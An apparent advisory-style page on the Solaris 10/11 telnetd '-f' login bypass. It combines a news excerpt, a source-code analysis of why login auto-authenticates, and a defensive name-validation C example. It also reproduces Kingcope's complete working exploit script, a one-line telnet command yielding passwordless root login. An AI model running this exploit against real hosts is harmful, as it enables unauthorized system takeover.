Sun Solaris Telnet Bypass

A login bypass vulnerability exists in the Telnet daemon of Sun Solaris 10 and 11. It allows an attacker to remotely log in as a privileged user (i.e. 'root') if the telnet daemon is running with root privileges on the targeted host. The vulnerability exists because the Solaris Telnet service does not scrub option switches from the client-supplied login name before passing it to the login program; login then auto-logs in the user named after the '-f' switch, as demonstrated by the referenced proof of concept.

This vulnerability allows a remote attacker to log in anonymously as any privileged user (including root) on a Solaris 10/11 host running the telnet daemon as root, enabling rapid system compromise without any user interaction.


#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
    echo "./sunos <host> <user>"
    echo "./sunos localhost bin"
    exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1


Zero-day vulnerability

The SANS Institute's Internet Storm Center advised network administrators this week to disable all telnet functions due to a zero-day vulnerability in Sun Microsystems Solaris versions 10 and 11.

The flaw – which could allow a malicious user access to a Solaris host – does not exist in Solaris versions 9 and lower, according to Internet Storm Center researcher Donald Smith.

Zero-day vulnerability found in Sun Microsystems Solaris 10 and 11

Solaris telnetd Analysis

From Solaris telnetd Analysis - SecuriTeam Blogs
-----------------------------------
kcope has put up a short PDF paper on why the vulnerability in telnetd happens:

/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c

        } else /* default, no auth. info available, login does it all */ {
                (void) execl(LOGIN_PROGRAM, "login",
                    "-p", "-h", host, "-d", slavename,
                    getenv("USER"), 0);
        }

/usr/src/cmd/login/login.c

                break;

        case 'f':
                /*
                 * Must be root to bypass authentication
                 * otherwise we exit() as punishment for trying.
                 */
                if (getuid() != 0 || geteuid() != 0) {
                        audit_error = ADT_FAIL_VALUE_AUTH_BYPASS;

                        login_exit(1); /* sigh */
                        /*NOTREACHED*/
                }
                /* save fflag user name for future use */
                SCPYL(user_name, optarg);
                fflag = B_TRUE;

As you can see, the "Must be root to bypass authentication" comment should already raise some worries, but what is funnier is that because we are requesting a different user than 'root' we actually get 'root' access, as login thinks we are already 'root' when it's called by in.telnetd.
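To make the mechanism concrete from the defender's side, here is an added C example (not Sun's code and not from the SecuriTeam post): fflag_user is a simplified model of how login(1)'s option parsing treats the unsanitized USER argument that in.telnetd appends to the execl above, and safe_login_name is the kind of check in.telnetd should apply before that execl. The accepted character set and the length limit are assumptions for the example, not Solaris' exact rules.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAX_USER_LEN 32   /* length limit: an assumption for this example */

/*
 * Simplified model of what login(1) does with the extra argument that
 * in.telnetd appends from the client-supplied USER variable.  login's
 * option parser reads a value such as "-fbin" as the -f switch with the
 * attached operand "bin", and because login runs as root the auth bypass
 * branch shown above is taken.  Returns the name that would be logged in
 * without a password, or NULL if the value is an ordinary user name.
 */
const char *fflag_user(const char *user)
{
    if (user == NULL || strncmp(user, "-f", 2) != 0 || user[2] == '\0')
        return NULL;
    return user + 2;
}

/*
 * The check in.telnetd should apply before the execl.  Rejects names
 * that login's getopt() could read as an option (leading '-') and
 * anything outside a conservative passwd-style character set (the set
 * chosen here is an assumption, not Solaris' exact rule).
 * Returns 1 if the name may safely be passed as a positional argument.
 */
int safe_login_name(const char *user)
{
    size_t i, n;

    if (user == NULL)
        return 0;
    n = strlen(user);
    if (n == 0 || n > MAX_USER_LEN || user[0] == '-')
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)user[i];
        if (!(isalnum(c) || c == '_' || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}
```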
